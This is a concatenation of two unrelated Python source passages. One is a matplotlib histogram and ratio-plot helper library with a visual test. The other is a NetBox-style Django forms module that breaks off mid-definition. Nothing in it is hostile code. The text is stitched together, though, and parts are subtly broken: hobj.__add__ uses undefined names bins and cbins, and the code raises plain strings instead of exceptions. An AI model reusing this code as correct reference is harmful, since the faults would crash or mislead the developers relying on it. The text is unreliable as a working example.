zorder : approximate plotting order
lw : linewidth
ls : linestyle
"""
errorbar_style = {'zorder': 3, 'ls': ' ', 'lw': 1, 'marker': 'o', 'markersize': 2.5}
plot_style = {'zorder': 2, 'ls': '-', 'lw': 1}
hist_style_step = {'zorder': 0, 'ls': '-', 'lw': 1, 'histtype': 'step'}
hist_style_fill = {'zorder': 0, 'ls': '-', 'lw': 1, 'histtype': 'stepfilled'}
hist_style_bar = {'zorder': 0, 'ls': '-', 'lw': 1, 'histtype': 'bar'}
class hobj:
""" Minimal histogram data object.
"""
def __init__(self, counts = 0, errs = 0, bins = 0, cbins = 0, binscale=1.0):
self.counts = counts
self.errs = errs
self.bins = bins
self.cbins = cbins
self.binscale = binscale
if (np.sum(counts) == 0):
self.is_empty = True
else:
self.is_empty = False
# + operator
def __add__(self, other):
if (self.is_empty == True): # Take the rhs
return other
if ((self.bins == other.bins).all() == False):
raise(__name__ + ' + operator: cannot operate on different sized histograms')
# Harmonic sum
binscale = 1/(1/self.binscale + 1/other.binscale)
counts = self.counts + other.counts
errs = np.sqrt(self.errs**2 + other.errs**2)
return hobj(counts, errs, bins, cbins, binscale)
# += operator
def __iadd__(self, other):
if (self.is_empty == True): # Still empty
return other
if ((self.bins == other.bins).all() == False):
raise(__name__ + ' += operator: cannot operate on different sized histograms')
self.counts = self.counts + other.counts
self.errs = np.sqrt(self.errs**2 + other.errs**2)
# Harmonic sum
self.binscale = 1/(1/self.binscale + 1/other.binscale)
return self
def stepspace(start, stop, step):
""" Linear binning edges between [start, stop]
"""
return np.arange(start, stop + step, step)
def plot_horizontal_line(ax, color=(0.5,0.5,0.5), linewidth=0.9):
""" For the ratio plot
"""
xlim = ax.get_xlim()
ax.plot(np.linspace(xlim[0], xlim[1], 2), np.array([1,1]), color=color, linewidth=linewidth)
def tick_calc(lim, step, N=6):
""" Tick spacing calculator.
"""
return [np.round(lim[0] + i*step, N) for i in range(1 + math.floor((lim[1] - lim[0])/step))]
def set_axis_ticks(ax, ticks, dim='x'):
""" Set ticks of the axis.
"""
if (dim == 'x'):
ax.set_xticks(ticks)
ax.set_xticklabels(list(map(str, ticks)))
elif (dim == 'y'):
ax.set_yticks(ticks)
ax.set_yticklabels(list(map(str, ticks)))
def tick_creator(ax, xtick_step=None, ytick_step=None, ylim_ratio=(0.7, 1.3),
    ratio_plot=True, minorticks_on=True, ytick_ratio_step=0.15, labelsize=9,
    labelsize_ratio=8, **kwargs) :
    """ Axis tick constructor.

    Args:
        ax:               list of axes ([main] or [main, ratio])
        xtick_step:       x tick spacing; None keeps matplotlib defaults
        ytick_step:       y tick spacing (main panel); None keeps defaults
        ylim_ratio:       y-range used to compute the ratio panel ticks
        ratio_plot:       True if ax[1] is a ratio panel
        minorticks_on:    enable minor ticks on every axis
        ytick_ratio_step: tick spacing of the ratio panel
        labelsize:        tick label font size (all axes)
        labelsize_ratio:  tick label font size (ratio panel y-axis)
        **kwargs:         absorbed unused extra arguments
    Returns:
        the same list of axes
    """
    # Get limits
    xlim = ax[0].get_xlim()
    ylim = ax[0].get_ylim()
    # X-axis
    if (xtick_step is not None):
        ticks = tick_calc(lim=xlim, step=xtick_step)
        set_axis_ticks(ax[-1], ticks, 'x')  # x labels belong on the bottom-most axis
    # Y-axis
    if (ytick_step is not None):
        ticks = tick_calc(lim=ylim, step=ytick_step)
        set_axis_ticks(ax[0], ticks, 'y')
    # Y-ratio-axis
    if ratio_plot:
        ax[0].tick_params(labelbottom=False)  # hide x labels on the main panel
        ax[1].tick_params(axis='y', labelsize=labelsize_ratio)
        ticks = tick_calc(lim=ylim_ratio, step=ytick_ratio_step)
        ticks = ticks[1:-1] # Remove the first and the last
        set_axis_ticks(ax[1], ticks, 'y')
    # Tick settings
    for a in ax:
        if minorticks_on: a.minorticks_on()
        a.tick_params(top=True, bottom=True, right=True, left=True, which='both', direction='in', labelsize=labelsize)
    return ax
def create_axes(xlabel='$x$', ylabel=r'Counts', ylabel_ratio='Ratio',
    xlim=(0,1), ylim=None, ylim_ratio=(0.7, 1.3),
    ratio_plot=True, figsize=(5,4), fontsize=9, units=None, **kwargs):
    """ Axes creator.

    Args:
        xlabel, ylabel:  axis labels (ylabel_ratio for the ratio panel)
        xlim, ylim:      axis limits; None keeps matplotlib defaults
        ylim_ratio:      y-limits of the ratio panel
        ratio_plot:      add a ratio subpanel below the main panel
        figsize:         figure size
        fontsize:        label font size
        units:           dict {'x': ..., 'y': ...} appended to axis labels
        **kwargs:        may contain 'density' (bool); forwarded to tick_creator
    Returns:
        fig, ax (list of axes)
    """
    if units is None:
        units = {'x': '', 'y': ''}  # avoid a mutable default argument
    # Create subplots
    N = 2 if ratio_plot else 1
    gridspec_kw = {'height_ratios': (3.333, 1) if ratio_plot else (1,), 'hspace': 0.0}
    fig, ax = plt.subplots(N, figsize=figsize, gridspec_kw=gridspec_kw)
    ax = [ax] if (N == 1) else ax
    # Axes limits
    for a in ax:
        if xlim is not None:
            a.set_xlim(*xlim)
    if ylim is not None:
        ax[0].set_ylim(*ylim)
    # Axes labels
    # ROBUSTNESS FIX: default to non-density labels when 'density' is absent
    # (previously kwargs['density'] raised KeyError)
    if kwargs.get('density', False):
        ylabel = f'$1/N$ {ylabel} / [{units["x"]}]'
    else:
        ylabel = f'{ylabel} [{units["y"]} / {units["x"]}]'
    xlabel = f'{xlabel} [{units["x"]}]'
    ax[0].set_ylabel(ylabel, fontsize=fontsize)
    ax[-1].set_xlabel(xlabel, fontsize=fontsize)
    # Ratio plot
    if ratio_plot:
        ax[1].set_ylabel(ylabel_ratio, fontsize=fontsize)
        ax[1].set_ylim(*ylim_ratio)
    # Setup ticks
    ax = tick_creator(ax=ax, ratio_plot=ratio_plot, **kwargs)
    return fig, ax
def ordered_legend(ax=None, order=None, frameon=False, unique=False, **kwargs):
    """ Ordered legends.

    Args:
        ax:       target axis; plt.gca() if None
        order:    list of labels giving the desired ordering (may be partial;
                  labels not listed are sorted to the end via np.inf)
        frameon:  draw a frame around the legend
        unique:   keep only the first handle for each distinct label
        **kwargs: forwarded to ax.legend()
    Returns:
        (handles, labels) tuple actually passed to the legend
    """
    def unique_everseen(seq, key=None):
        # Keep elements of seq whose corresponding key has not been seen yet (order preserving)
        seen = set()
        seen_add = seen.add
        return [x for x,k in zip(seq,key) if not (k in seen or seen_add(k))]
    if ax is None: ax=plt.gca()
    handles, labels = ax.get_legend_handles_labels()
    # Sort both labels and handles by labels
    labels, handles = zip(*sorted(zip(labels, handles), key=lambda t: t[0]))
    # Sort according to a given list, which may be incomplete
    if order is not None:
        keys=dict(zip(order,range(len(order))))
        labels, handles = zip(*sorted(zip(labels, handles), key=lambda t, keys=keys: keys.get(t[0],np.inf)))
    # Keep only the first of each handle
    if unique: labels, handles= zip(*unique_everseen(zip(labels,handles), key = labels))
    ax.legend(handles, labels, frameon=frameon, **kwargs)
    return (handles, labels)
def binwidth(bins):
    """ Return the width of each bin from a linear array of bin edges. """
    return bins[1:] - bins[:-1]
def edge2centerbins(bins) :
    """ Convert bin edges to bin centers (midpoints of consecutive edges). """
    return 0.5 * (bins[1:] + bins[:-1])
def ratioerr(A, B, sigma_A, sigma_B, sigma_AB = 0, EPS = 1E-15):
    """ Ratio f(A,B) = A/B error, by Taylor expansion of f.

    Values with |value| < EPS are clamped to EPS to protect against division
    by (near) zero.

    Args:
        A, B:             numerator / denominator arrays
        sigma_A, sigma_B: their uncertainties
        sigma_AB:         covariance term (default 0, i.e. uncorrelated)
        EPS:              clamp threshold
    Returns:
        array of ratio uncertainties
    """
    # BUGFIX: operate on copies; the previous in-place boolean assignment
    # silently modified the caller's arrays
    A = np.array(A, dtype=np.float64, copy=True)
    B = np.array(B, dtype=np.float64, copy=True)
    A[np.abs(A) < EPS] = EPS
    B[np.abs(B) < EPS] = EPS
    return np.abs(A/B) * np.sqrt((sigma_A/A)**2 + (sigma_B/B)**2 - 2*sigma_AB/(A*B))
def hist_to_density(counts, errs, bins):
    """ Normalize counts and errors to a unit-integral density over the visible histogram range. """
    denom = counts.sum() * binwidth(bins)
    return counts / denom, errs / denom
def hist_to_density_fullspace(counts, errs, bins, totalweight):
    """ Normalize histogram to a unit integral density function over the total
    sum of event weights (not just the visible histogram range mass).
    """
    denom = totalweight * binwidth(bins)
    return counts / denom, errs / denom
def hist(x, bins=30, density=False, weights=None):
    """ Calculate a histogram with weighted per-bin uncertainties.

    Args:
        x:       input values
        bins:    bin count or array of edges (np.histogram semantics)
        density: normalize to unit integral over the visible range
        weights: per-event weights (default: all ones)
    Returns:
        counts, errs, bins (edges), cbins (centers)
    """
    x = np.asarray(x, dtype=np.float64)
    if weights is None:
        weights = np.ones(x.shape)
    weights = np.array(weights)
    counts, bins = np.histogram(x, bins=bins, weights=weights)
    cbins = edge2centerbins(bins)
    # Weighted per-bin error: sqrt of the sum of squared weights
    # (the L2 norm of the weights falling into each bin)
    idx = np.digitize(x, bins)
    errs = np.asarray([np.linalg.norm(weights[idx == b], 2) for b in range(1, len(bins))])
    # Optional density normalization over the visible bin range
    if density:
        counts, errs = hist_to_density(counts=counts, errs=errs, bins=bins)
    return counts, errs, bins, cbins
def hist_obj(x, bins=30, weights=None):
    """ Wrapper returning the histogram as a hobj instance. """
    c, e, b, cb = hist(x, bins=bins, weights=weights)
    return hobj(c, e, b, cb)
def generate_colormap():
    """ Default colormap: black followed by ten Set1 palette colors (RGBA rows). """
    palette = plt.cm.Set1(np.linspace(0, 1, 10))
    # Prepend black with full alpha
    black = np.zeros((1, 4))
    black[:, 3] = 1.0
    return np.concatenate((black, palette))
def hist_filled_error(ax, bins, cbins, y, err, color, **kwargs):
    """ Step-histogram style shaded error band around y +- err. """
    opts = kwargs.copy()
    opts['lw'] = 0
    opts.pop('histtype', None)  # fill_between does not accept 'histtype'
    lo = y - err
    hi = y + err
    # Band over all bins except the closing edge (forward steps) ...
    ax.fill_between(bins[:-1], lo, hi, step='post', alpha=0.3, color=color, **opts)
    # ... then close the last bin with a backward step
    ax.fill_between(bins[-2:], lo[-2:], hi[-2:], step='pre', alpha=0.3, color=color, **opts)
def superplot(data, observable=None, ratio_plot=True, yscale='linear', ratio_error_plot=True,
    legend_counts=False, color=None, legend_properties=None, bottom_PRC=5, EPS=1E-12):
    """ Superposition (overlaid) plotting.

    Args:
        data:        list of dicts with keys 'hdata' (hobj), 'hfunc' ('hist'|'errorbar'|'plot'),
                     'style', 'color', 'label', 'obs'
        observable:  observable definition dict; taken from data[0]['obs'] if None
        ratio_plot:  draw a ratio subpanel w.r.t. data[0]
        yscale:      'linear' or 'log'
        ratio_error_plot: draw error bands in the ratio panel
        legend_counts: append total event counts to legend labels
        color:       colormap array; default colormap if None
        legend_properties: kwargs for the legend (default {'fontsize': 9})
        bottom_PRC:  percentile used for the lower y auto-limit
        EPS:         numerical protection threshold for the auto-limits
    Returns:
        fig, ax
    """
    if legend_properties is None:
        legend_properties = {'fontsize': 9}  # avoid a mutable default argument
    if observable is None:
        observable = data[0]['obs']
    fig, ax = create_axes(**observable, ratio_plot=ratio_plot)
    if color is None:
        color = generate_colormap()
    legend_labels = []
    # y-axis auto-limit accumulators
    bottom_count = 1e32
    ceiling_count = 0
    # Plot histograms
    for i in range(len(data)):
        if data[i]['hdata'].is_empty:
            print(__name__ + f'.superplot: Skipping empty histogram for entry {i}')
            continue
        c = data[i]['color']
        if c is None: c = color[i]
        counts = data[i]['hdata'].counts * data[i]['hdata'].binscale
        errs = data[i]['hdata'].errs * data[i]['hdata'].binscale
        bins = data[i]['hdata'].bins
        cbins = data[i]['hdata'].cbins
        # -----------------------------------------------
        # ** For visualization autolimits **
        # Use percentile for the bottom (~ handle noisy small bins);
        # guard against histograms with no counts above threshold
        if np.any(counts > EPS):
            bottom_count = np.min([bottom_count, np.percentile(counts[counts > EPS], bottom_PRC)])
        if np.any(counts > 0):
            ceiling_count = np.max([ceiling_count, np.max(counts[counts > 0])])
        # -----------------------------------------------
        label = data[i]['label']
        if legend_counts:
            label += f' $N={np.sum(data[i]["hdata"].counts):.1f}$'
        legend_labels.append(label)
        if data[i]['hfunc'] == 'hist':
            ax[0].hist(x=cbins, bins=bins, weights=counts, color=c, label=label, **data[i]['style'])
            hist_filled_error(ax=ax[0], bins=bins, cbins=cbins, y=counts, err=errs, color=c, **data[i]['style'])
        elif data[i]['hfunc'] == 'errorbar':
            ax[0].errorbar(x=cbins, y=counts, yerr=errs, color=c, label=label, **data[i]['style'])
        elif data[i]['hfunc'] == 'plot':
            ax[0].plot(cbins, counts, color=c, label=label, **data[i]['style'])
            new_args = data[i]['style'].copy()
            new_args['lw'] = 0
            ax[0].fill_between(cbins, counts-errs, counts+errs, alpha=0.3, color=c, **new_args)
    # Plot ratio histograms (reference = data[0])
    if ratio_plot:
        plot_horizontal_line(ax[1])
        for i in range(len(data)):
            if data[i]['hdata'].is_empty:
                print(__name__ + f'.superplot: Skipping empty histogram for entry {i} (ratioplot)')
                continue
            c = data[i]['color']
            if c is None: c = color[i]
            A = data[i]['hdata'].counts * data[i]['hdata'].binscale
            B = data[0]['hdata'].counts * data[0]['hdata'].binscale
            sigma_A = data[i]['hdata'].errs * data[i]['hdata'].binscale
            sigma_B = data[0]['hdata'].errs * data[0]['hdata'].binscale
            sigma_AB = 0  # correlations not tracked
            ratio_errs = ratioerr(A=A, B=B, sigma_A=sigma_A, sigma_B=sigma_B, sigma_AB=sigma_AB)
            # Protect division by zero (literal constant; previously shadowed the EPS parameter)
            ratio = A / (B + 1E-30)
            bins = data[i]['hdata'].bins
            cbins = data[i]['hdata'].cbins
            # If no errors turned on
            if not ratio_error_plot:
                ratio_errs = np.zeros(ratio_errs.shape)
            if data[i]['hfunc'] == 'hist':
                ax[1].hist(x=cbins, bins=bins, weights=ratio, color=c, **data[i]['style'])
                hist_filled_error(ax=ax[1], bins=bins, cbins=cbins, y=ratio, err=ratio_errs, color=c, **data[i]['style'])
            elif data[i]['hfunc'] == 'errorbar':
                ax[1].errorbar(x=cbins, y=ratio, yerr=ratio_errs, color=c, **data[i]['style'])
            elif data[i]['hfunc'] == 'plot':
                ax[1].plot(cbins, ratio, color=c, **data[i]['style'])
                new_args = data[i]['style'].copy()
                new_args['lw'] = 0
                ax[1].fill_between(cbins, ratio-ratio_errs, ratio+ratio_errs, alpha=0.3, color=c, **new_args)
    # Legend
    if legend_labels:
        ordered_legend(ax = ax[0], order=legend_labels, **legend_properties)
    # --------------------------------------------------------------------
    # Upper figure
    # Log y-scale
    ax[0].set_yscale(yscale)
    # y-limits
    if observable['ylim'] is None:
        if yscale == 'log':
            ax[0].set_ylim([bottom_count / 4, ceiling_count * 10])
        else:
            ax[0].set_ylim([0, ceiling_count * 1.5])
    else:
        # BUGFIX: was 'observables.ylim' (undefined name -> NameError)
        ax[0].set_ylim(observable['ylim'])
    # --------------------------------------------------------------------
    return fig, ax
def change2density_labels(all_obs):
    """ Switch every observable's y-axis label to a density style, ~ 1/N dN/dx [1/xdim]. """
    for key, obs in all_obs.items():
        xvar = obs['xlabel'].replace('$', '')
        obs['ylabel'] = '$\\frac{1}{N} \\; ' + f'dN/d{xvar}$'
        obs['units']['y'] = '1'
    return all_obs
def histmc(mcdata, all_obs, density=False, scale=None, color=(0,0,1), label='none', style=hist_style_step):
    """ Histogram every observable of an MC sample.

    Returns a dict mapping observable name -> plotting-object dict.
    """
    out = {}
    for OBS in all_obs.keys():
        # Histogram the observable
        counts, errs, bins, cbins = hist(x=mcdata['data'][OBS], bins=all_obs[OBS]['bins'], weights=mcdata['weights'])
        # Differential cross section within the histogram range;
        # dividing by sum(weights) handles the range integral (overflow) properly
        binscale = mcdata['xsection_pb'] / binwidth(bins) / np.sum(mcdata['weights'])
        # Optional extra scale factor
        if scale is not None:
            binscale = binscale * scale
        # Density normalization to unit integral over the bins
        if density:
            counts, errs = hist_to_density(counts=counts, errs=errs, bins=bins)
            binscale = 1.0
        out[OBS] = {'hdata': hobj(counts, errs, bins, cbins, binscale), 'hfunc' : 'hist', 'color': color, 'label': label, 'style' : style}
    return out
def histhepdata(hepdata, all_obs, scale=None, density=False, MC_XS_SCALE=1E12, label='Data', style=hist_style_step):
    """ Build histogram objects from HEPData-style entries, over all observables.

    Args:
        hepdata:     dict: observable -> {'y', 'y_err', 'bins', 'x', 'scale', 'binwidth'}
        all_obs:     observable definitions (only the keys are used here)
        scale:       optional extra multiplicative scale factor
        density:     normalize to unit integral over the bins
        MC_XS_SCALE: cross-section unit conversion factor
        label:       legend label
        style:       histogram plotting style dict
    Returns:
        dict: observable name -> plotting-object dict
    """
    obj = {}
    for OBS in all_obs.keys():
        y = hepdata[OBS]['y']
        yerr = hepdata[OBS]['y_err']
        bins = hepdata[OBS]['bins']
        cbins = hepdata[OBS]['x']
        binscale = hepdata[OBS]['scale'] * MC_XS_SCALE
        # Additional scale factor
        if scale is not None:
            binscale *= scale
        # Density integral 1 over the histogram bins
        if density:
            norm = hepdata[OBS]['binwidth'] * y.sum()
            # BUGFIX: out-of-place division; the previous '/=' mutated the
            # caller's hepdata arrays in place
            y = y / norm
            yerr = yerr / norm
            binscale = 1.0
        obj[OBS] = {'hdata': hobj(y, yerr, bins, cbins, binscale), 'hfunc' : 'hist', 'color': (0,0,0), 'label': label, 'style' : style}
    return obj
def fuse_histograms(hist_list):
    """
    Fuse (sum) a list of count histogram object collections.

    The first entry serves as a deep-copied accumulator template; for each
    observable the remaining entries are folded in with '+='.
    """
    total = copy.deepcopy(hist_list[0])
    for obs_key in total.keys():
        for other in hist_list[1:]:
            total[obs_key]['hdata'] += other[obs_key]['hdata']
    return total
def test_iceplot():
    """ Visual unit tests.

    Writes example figures under ./testfigs; output is inspected by eye,
    no programmatic assertions are made.
    """
    import pytest
    import pathlib
    pathlib.Path("./testfigs").mkdir(parents=True, exist_ok=True)
    # ------------------------------------------------------------------------
    set_global_style()
    # Synthetic input data: Gaussians of increasing width
    r1 = np.random.randn(25000) * 0.8
    r2 = np.random.randn(25000) * 1
    r3 = np.random.randn(25000) * 1.2
    r4 = np.random.randn(25000) * 1.5
    # ------------------------------------------------------------------------
    # Mathematical definitions
    # Momentum squared
    def pt2(x):
        return np.power(x,2);
    # ------------------------------------------------------------------------
    # Observables containers
    obs_pt2 = {
        # Axis limits
        'xlim' : (0, 1.5),
        'ylim' : None,
        'xlabel' : r'$p_t^2$',
        'ylabel' : r'Counts',
        'units' : {'x': r'GeV$^2$', 'y' : r'counts'},
        'label' : r'Transverse momentum squared',
        'figsize' : (4, 3.75),
        # Ratio
        'ylim_ratio' : (0.7, 1.3),
        # Histogramming
        'bins' : np.linspace(0, 1.5, 60),
        'density' : False,
        # Function to calculate
        'func' : pt2
    }
    # ------------------------------------------------------------------------
    # ** Example: single errorbar histogram **
    fig1, ax1 = create_axes(**obs_pt2, ratio_plot=False)
    counts, errs, bins, cbins = hist(obs_pt2['func'](r1), bins=obs_pt2['bins'], density=obs_pt2['density'])
    ax1[0].errorbar(x=cbins, y=counts, yerr=errs, color=(0,0,0), label='Data $\\alpha$', **errorbar_style)
    ax1[0].legend(frameon=False)
    fig1.savefig('./testfigs/testplot_1.pdf', bbox_inches='tight')
    # ------------------------------------------------------------------------
    # ** Example: single step histogram **
    fig2, ax2 = create_axes(**obs_pt2, ratio_plot=False)
    counts, errs, bins, cbins = hist(obs_pt2['func'](r1), bins=obs_pt2['bins'], density=obs_pt2['density'])
    ax2[0].hist(x=cbins, bins=bins, weights=counts, color=(0.5, 0.2, 0.1), label='Data $\\alpha$', **hist_style_step)
    ax2[0].legend(frameon=False)
    fig2.savefig('./testfigs/testplot_2.pdf', bbox_inches='tight')
    # ------------------------------------------------------------------------
    # ** Example: two histograms with a manual ratio panel **
    fig3, ax3 = create_axes(**obs_pt2, ratio_plot=True)
    counts1, errs, bins, cbins = hist(obs_pt2['func'](r1), bins=obs_pt2['bins'], density=obs_pt2['density'])
    ax3[0].hist(x=cbins, bins=bins, weights=counts1, color=(0,0,0), label='Data 1', **hist_style_step)
    counts2, errs, bins, cbins = hist(obs_pt2['func'](r2), bins=obs_pt2['bins'], density=obs_pt2['density'])
    ax3[0].hist(x=cbins, bins=bins, weights=counts2, color=(1,0,0), alpha=0.5, label='Data 2', **hist_style_step)
    ordered_legend(ax = ax3[0], order=['Data 1', 'Data 2'])
    # Ratio
    plot_horizontal_line(ax3[1])
    ax3[1].hist(x=cbins, bins=bins, weights=counts2 / (counts1 + 1E-30), color=(1,0,0), alpha=0.5, label='Data $\\beta$', **hist_style_step)
    fig3.savefig('./testfigs/testplot_3.pdf', bbox_inches='tight')
    # ------------------------------------------------------------------------
    # ** Example: superplot with four datasets **
    data_template = {
        'data' : None,
        'weights': None,
        'label' : 'Data',
        'hfunc' : 'errorbar',
        'style' : errorbar_style,
        'obs' : obs_pt2,
        'hdata' : None,
        'color' : None
    }
    # Data source <-> Observable collections
    # dict.copy() is shallow; safe here because values are replaced below, not mutated
    data1 = data_template.copy()
    data2 = data_template.copy()
    data3 = data_template.copy()
    data4 = data_template.copy()
    data1.update({
        'data' : r1,
        'label' : 'Data $\\alpha$',
        'hfunc' : 'errorbar',
        'style' : errorbar_style,
    })
    data2.update({
        'data' : r2,
        'label' : 'Data $\\beta$',
        'hfunc' : 'hist',
        'style' : hist_style_step,
    })
    data3.update({
        'data' : r3,
        'label' : 'Data $\\gamma$',
        'hfunc' : 'hist',
        'style' : hist_style_step,
    })
    data4.update({
        'data' : r4,
        'label' : 'Data $\\delta$',
        'hfunc' : 'plot',
        'style' : plot_style,
    })
    data = [data1, data2, data3, data4]
    # Calculate histograms
    for i in range(len(data)):
        data[i]['hdata'] = hist_obj(data[i]['obs']['func'](data[i]['data']), bins=data[i]['obs']['bins'])
    # Plot it
    fig4, ax4 = superplot(data, ratio_plot=True, yscale='log')
    fig5, ax5 = superplot(data, ratio_plot=True, yscale='linear', ratio_error_plot=False)
    fig4.savefig('./testfigs/testplot_4.pdf', bbox_inches='tight')
    fig5.savefig('./testfigs/testplot_5.pdf', bbox_inches='tight')
|
import re
from django import forms
from django.contrib.auth.models import User
from django.contrib.contenttypes.models import ContentType
from django.contrib.postgres.forms.array import SimpleArrayField
from django.core.exceptions import ObjectDoesNotExist
from django.utils.safestring import mark_safe
from netaddr import EUI
from netaddr.core import AddrFormatError
from timezone_field import TimeZoneFormField
from circuits.models import Circuit, CircuitTermination, Provider
from extras.forms import (
AddRemoveTagsForm, CustomFieldBulkEditForm, CustomFieldModelCSVForm, CustomFieldFilterForm, CustomFieldModelForm,
LocalConfigContextFilterForm,
)
from extras.models import Tag
from ipam.constants import BGP_ASN_MAX, BGP_ASN_MIN
from ipam.models import IPAddress, VLAN
from tenancy.forms import TenancyFilterForm, TenancyForm
from tenancy.models import Tenant, TenantGroup
from utilities.forms import (
APISelect, APISelectMultiple, add_blank_choice, BootstrapMixin, BulkEditForm, BulkEditNullBooleanSelect,
ColorSelect, CommentField, CSVChoiceField, CSVContentTypeField, CSVModelChoiceField, CSVModelForm,
DynamicModelChoiceField, DynamicModelMultipleChoiceField, ExpandableNameField, form_from_model, JSONField,
NumericArrayField, SelectWithPK, SmallTextarea, SlugField, StaticSelect2, StaticSelect2Multiple, TagFilterField,
BOOLEAN_WITH_BLANK_CHOICES,
)
from virtualization.models import Cluster, ClusterGroup
from .choices import *
from .constants import *
from .models import (
Cable, DeviceBay, DeviceBayTemplate, ConsolePort, ConsolePortTemplate, ConsoleServerPort, ConsoleServerPortTemplate,
Device, DeviceRole, DeviceType, FrontPort, FrontPortTemplate, Interface, InterfaceTemplate, Manufacturer,
InventoryItem, Platform, PowerFeed, PowerOutlet, PowerOutletTemplate, PowerPanel, PowerPort, PowerPortTemplate,
Rack, RackGroup, RackReservation, RackRole, RearPort, RearPortTemplate, Region, Site, VirtualChassis,
)
# Pattern matching the '{pk}' device reference form, e.g. '{123}'
DEVICE_BY_PK_RE = r'{\d+\}'
# Help text (HTML) shown for interface 802.1Q mode selection
INTERFACE_MODE_HELP_TEXT = """
Access: One untagged VLAN<br />
Tagged: One untagged VLAN and/or one or more tagged VLANs<br />
Tagged (All): Implies all VLANs are available (w/optional untagged VLAN)
"""
def get_device_by_name_or_pk(name):
    """
    Attempt to retrieve a device by either its name or primary key ('{pk}').
    """
    # A value of the form '{123}' references the device by primary key
    if re.match(DEVICE_BY_PK_RE, name):
        return Device.objects.get(pk=name.strip('{}'))
    return Device.objects.get(name=name)
class DeviceComponentFilterForm(BootstrapMixin, forms.Form):
    """
    Base filter form for device component list views: free-text search plus
    cascading region -> site -> device scoping.
    """
    field_order = [
        'q', 'region', 'site'
    ]
    q = forms.CharField(
        required=False,
        label='Search'
    )
    region = DynamicModelMultipleChoiceField(
        queryset=Region.objects.all(),
        to_field_name='slug',
        required=False
    )
    site = DynamicModelMultipleChoiceField(
        queryset=Site.objects.all(),
        to_field_name='slug',
        required=False,
        query_params={
            'region': '$region'
        }
    )
    device_id = DynamicModelMultipleChoiceField(
        queryset=Device.objects.all(),
        required=False,
        label='Device',
        query_params={
            'site': '$site'
        }
    )
class InterfaceCommonForm(forms.Form):
    """
    Mixin providing shared 802.1Q mode/VLAN validation for device and VM
    interface forms.
    """
    def clean(self):
        """Cross-validate the 802.1Q mode against the assigned tagged VLANs."""
        super().clean()
        # An interface belongs either to a device or to a virtual machine
        parent_field = 'device' if 'device' in self.cleaned_data else 'virtual_machine'
        tagged_vlans = self.cleaned_data['tagged_vlans']
        # Untagged interfaces cannot be assigned tagged VLANs
        if self.cleaned_data['mode'] == InterfaceModeChoices.MODE_ACCESS and tagged_vlans:
            raise forms.ValidationError({
                'mode': "An access interface cannot have tagged VLANs assigned."
            })
        # Remove all tagged VLAN assignments from "tagged all" interfaces
        elif self.cleaned_data['mode'] == InterfaceModeChoices.MODE_TAGGED_ALL:
            self.cleaned_data['tagged_vlans'] = []
        # Validate tagged VLANs; must be a global VLAN or in the same site
        elif self.cleaned_data['mode'] == InterfaceModeChoices.MODE_TAGGED:
            valid_sites = [None, self.cleaned_data[parent_field].site]
            invalid_vlans = [str(v) for v in tagged_vlans if v.site not in valid_sites]
            if invalid_vlans:
                # BUGFIX: use single quotes inside the f-string; reusing the
                # enclosing double quote is a SyntaxError before Python 3.12
                raise forms.ValidationError({
                    'tagged_vlans': f"The tagged VLANs ({', '.join(invalid_vlans)}) must belong to the same site as "
                                    f"the interface's parent device/VM, or they must be global"
                })
class ComponentForm(BootstrapMixin, forms.Form):
    """
    Subclass this form when facilitating the creation of one or more device component or component templates based on
    a name pattern.
    """
    name_pattern = ExpandableNameField(
        label='Name'
    )
    label_pattern = ExpandableNameField(
        label='Label',
        required=False,
        help_text='Alphanumeric ranges are supported. (Must match the number of names being created.)'
    )
    def clean(self):
        """Ensure name_pattern and label_pattern expand to the same number of components."""
        super().clean()
        # Validate that the number of components being created from both the name_pattern and label_pattern are equal
        if self.cleaned_data['label_pattern']:
            name_pattern_count = len(self.cleaned_data['name_pattern'])
            label_pattern_count = len(self.cleaned_data['label_pattern'])
            if name_pattern_count != label_pattern_count:
                raise forms.ValidationError({
                    'label_pattern': f'The provided name pattern will create {name_pattern_count} components, however '
                                     f'{label_pattern_count} labels will be generated. These counts must match.'
                }, code='label_pattern_mismatch')
#
# Fields
#
class MACAddressField(forms.Field):
    """Form field which validates and normalizes its input as an EUI-48 MAC address."""
    widget = forms.CharField
    default_error_messages = {
        'invalid': 'MAC address must be in EUI-48 format',
    }
    def to_python(self, value):
        """Coerce the raw input into a netaddr.EUI instance; raise ValidationError on a bad format."""
        value = super().to_python(value)
        # Validate MAC address format
        # NOTE(review): assumes value is a string here; a None (empty optional input)
        # would raise AttributeError on .strip() — confirm the field is always required
        try:
            value = EUI(value.strip())
        except AddrFormatError:
            raise forms.ValidationError(self.error_messages['invalid'], code='invalid')
        return value
#
# Regions
#
class RegionForm(BootstrapMixin, forms.ModelForm):
    """Create/edit form for Region objects (supports nesting via the parent field)."""
    parent = DynamicModelChoiceField(
        queryset=Region.objects.all(),
        required=False
    )
    slug = SlugField()
    class Meta:
        model = Region
        fields = (
            'parent', 'name', 'slug', 'description',
        )
class RegionCSVForm(CSVModelForm):
    """CSV bulk-import form for Region objects; the parent is referenced by name."""
    parent = CSVModelChoiceField(
        queryset=Region.objects.all(),
        required=False,
        to_field_name='name',
        help_text='Name of parent region'
    )
    class Meta:
        model = Region
        fields = Region.csv_headers
class RegionFilterForm(BootstrapMixin, forms.Form):
    """Filter form for the region list view (free-text search only)."""
    # NOTE(review): 'model = Site' (not Region) — looks intentional upstream, but confirm
    model = Site
    q = forms.CharField(
        required=False,
        label='Search'
    )
#
# Sites
#
class SiteForm(BootstrapMixin, TenancyForm, CustomFieldModelForm):
    """Create/edit form for Site objects, including tenancy, location and contact details."""
    region = DynamicModelChoiceField(
        queryset=Region.objects.all(),
        required=False
    )
    slug = SlugField()
    comments = CommentField()
    tags = DynamicModelMultipleChoiceField(
        queryset=Tag.objects.all(),
        required=False
    )
    class Meta:
        model = Site
        fields = [
            'name', 'slug', 'status', 'region', 'tenant_group', 'tenant', 'facility', 'asn', 'time_zone', 'description',
            'physical_address', 'shipping_address', 'latitude', 'longitude', 'contact_name', 'contact_phone',
            'contact_email', 'comments', 'tags',
        ]
        widgets = {
            'physical_address': SmallTextarea(
                attrs={
                    'rows': 3,
                }
            ),
            'shipping_address': SmallTextarea(
                attrs={
                    'rows': 3,
                }
            ),
            'status': StaticSelect2(),
            'time_zone': StaticSelect2(),
        }
        help_texts = {
            'name': "Full name of the site",
            'facility': "Data center provider and facility (e.g. Equinix NY7)",
            'asn': "BGP autonomous system number",
            'time_zone': "Local time zone",
            'description': "Short description (will appear in sites list)",
            'physical_address': "Physical location of the building (e.g. for GPS)",
            'shipping_address': "If different from the physical address",
